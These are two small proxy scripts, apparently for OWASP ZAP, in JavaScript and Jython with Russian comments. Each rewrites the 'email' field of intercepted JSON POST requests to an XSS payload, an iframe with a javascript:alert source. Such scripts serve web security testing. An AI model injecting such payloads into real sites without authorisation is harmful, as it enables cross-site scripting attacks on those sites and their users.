File: script2.js
function invokeWith(msg) {

    var header = msg.getRequestHeader()
	if(!header.getHeader("Content-Type")
		|| !header.getHeader("Content-Type").trim().equalsIgnoreCase("application/json")
		|| header.getMethod() != "POST"
		|| msg.getRequestBody().length() == 0
	){
		return;
	}

	var body = msg.getRequestBody().toString();
	try{
		var data = JSON.parse(body);
	}
	catch(err){
		print("failed: " + err.message);
		return;
	}

     data.email = "<iframe src=\"javascript:alert('xss')\">";
     var new_data = JSON.stringify(data);

     //print(new_data); //для просмотра внесенных изменений 

     msg.setRequestBody(new_data);
     msg.getRequestHeader().setContentLength(msg.getRequestBody().length());
}

File: script2.py
import json

from org.parosproxy.paros.network import HttpHeader
from collections import OrderedDict

def invokeWith(msg):

  header = msg.getRequestHeader()

  if(not(header.getHeader("Content-Type"))
    or not(header.getHeader("Content-Type").__contains__("application/json"))
    or header.getMethod() != "POST"
    or msg.getRequestBody().length() == 0
  ):
    return

  body = msg.getRequestBody().toString()
  try:
    data = json.loads(body,object_pairs_hook = OrderedDict)
  except:
    print("failed")
    return

  data["email"] = "<iframe src=\"javascript:alert('xss')\">"
  new_body = json.dumps(data)
  msg.setRequestBody(new_body)
  msg.getRequestHeader().setContentLength(msg.getRequestBody().length())

  print(msg.getRequestBody()) #просмотр нового тела запроса
